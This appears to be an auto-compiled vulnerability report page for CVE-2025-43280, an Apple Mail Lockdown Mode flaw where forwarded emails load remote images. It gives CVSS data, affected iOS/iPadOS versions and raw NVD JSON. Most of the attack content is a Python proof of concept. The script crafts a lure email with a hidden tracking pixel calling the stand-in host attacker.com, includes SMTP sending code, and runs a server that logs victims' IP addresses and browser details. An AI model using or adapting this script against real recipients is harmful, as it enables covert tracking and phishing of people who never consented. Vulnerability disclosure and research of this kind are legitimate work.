Security Vulnerability Report
CVE-2025-43280 CVSS 4.7 MEDIUM

Published: 2025-10-15 20:15:35
Last Modified: 2026-04-02 19:20:19

Description

The issue was resolved by not loading remote images. This issue is fixed in iOS 18.6 and iPadOS 18.6. Forwarding an email could display remote images in Mail in Lockdown Mode.

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
Apple iOS < 18.6
Apple iPadOS < 18.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-43280 PoC - Apple iOS/iPadOS Mail Lockdown Mode Remote Image Disclosure
# This PoC demonstrates how a malicious email can leak user information
# even when the device is in Lockdown Mode, by exploiting the email forwarding feature.
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from http.server import HTTPServer, BaseHTTPRequestHandler


# Step 1: Craft a malicious email with a remote tracking image
def create_malicious_email(attacker_server, target_email):
    """
    Create an email that contains a remote image URL.
    When the victim forwards this email in Lockdown Mode, the Mail app
    will automatically load the remote image, leaking the victim's IP
    address and other info.
    """
    msg = MIMEMultipart('related')
    msg['Subject'] = 'Important Document - Please Review'
    msg['From'] = '[email protected]'
    msg['To'] = target_email

    # HTML body with remote tracking image
    html_content = f'''
    <html>
      <body>
        <p>Dear User,</p>
        <p>Please find the important document below:</p>
        <img src="http://{attacker_server}/tracker.gif?email={target_email}" width="1" height="1" alt="" />
        <p>Best regards,<br>Sender</p>
      </body>
    </html>
    '''
    msg_html = MIMEText(html_content, 'html')
    msg.attach(msg_html)
    return msg


# Step 2: Attacker server to collect leaked information
class TrackerHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # Log the victim's information
        client_ip = self.client_address[0]
        user_agent = self.headers.get('User-Agent', 'Unknown')
        path = self.path
        print("[+] Victim information leaked!")
        print(f"    IP Address: {client_ip}")
        print(f"    User-Agent: {user_agent}")
        print(f"    Request Path: {path}")

        # Return a 1x1 transparent GIF
        self.send_response(200)
        self.send_header('Content-Type', 'image/gif')
        self.end_headers()
        # Minimal 1x1 transparent GIF bytes
        self.wfile.write(
            b'GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00'
            b'!\xf9\x04\x00\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00'
            b'\x00\x02\x02D\x01\x00;'
        )


# Step 3: Send the malicious email
def send_email(smtp_server, smtp_port, username, password, msg):
    """Send the crafted malicious email via SMTP"""
    with smtplib.SMTP(smtp_server, smtp_port) as server:
        server.starttls()
        server.login(username, password)
        server.send_message(msg)


# Step 4: Start the tracking server
def start_tracker(port=8080):
    """Start HTTP server to collect leaked victim data"""
    server = HTTPServer(('0.0.0.0', port), TrackerHandler)
    print(f"[*] Tracker server listening on port {port}")
    server.serve_forever()


if __name__ == '__main__':
    # Configuration
    ATTACKER_SERVER = 'attacker.com'
    TARGET_EMAIL = '[email protected]'
    SMTP_SERVER = 'smtp.malicious.com'
    SMTP_PORT = 587
    SMTP_USER = '[email protected]'
    SMTP_PASS = 'password'

    # Create and send malicious email
    malicious_email = create_malicious_email(ATTACKER_SERVER, TARGET_EMAIL)
    # send_email(SMTP_SERVER, SMTP_PORT, SMTP_USER, SMTP_PASS, malicious_email)

    # Start tracking server to collect leaked data
    # start_tracker(8080)

    print("[*] PoC ready. Send the malicious email to target and wait for forwarding.")
    print("[*] When victim forwards the email in Lockdown Mode, tracker will receive their IP.")

References

https://support.apple.com/en-us/124147 (Release Notes, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43280", "sourceIdentifier": "[email protected]", "published": "2025-10-15T20:15:34.893", "lastModified": "2026-04-02T19:20:19.293", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "The issue was resolved by not loading remote images. This issue is fixed in iOS 18.6 and iPadOS 18.6. Forwarding an email could display remote images in Mail in Lockdown Mode."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-940"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "18.6", "matchCriteriaId": "8ED4015E-C707-4A91-86B3-23100E0DFA8F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "18.6", "matchCriteriaId": "BD9D42A7-DE2A-4D5A-8C7B-002A60148483"}]}]}], "references": [{"url": "https://support.apple.com/en-us/124147", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}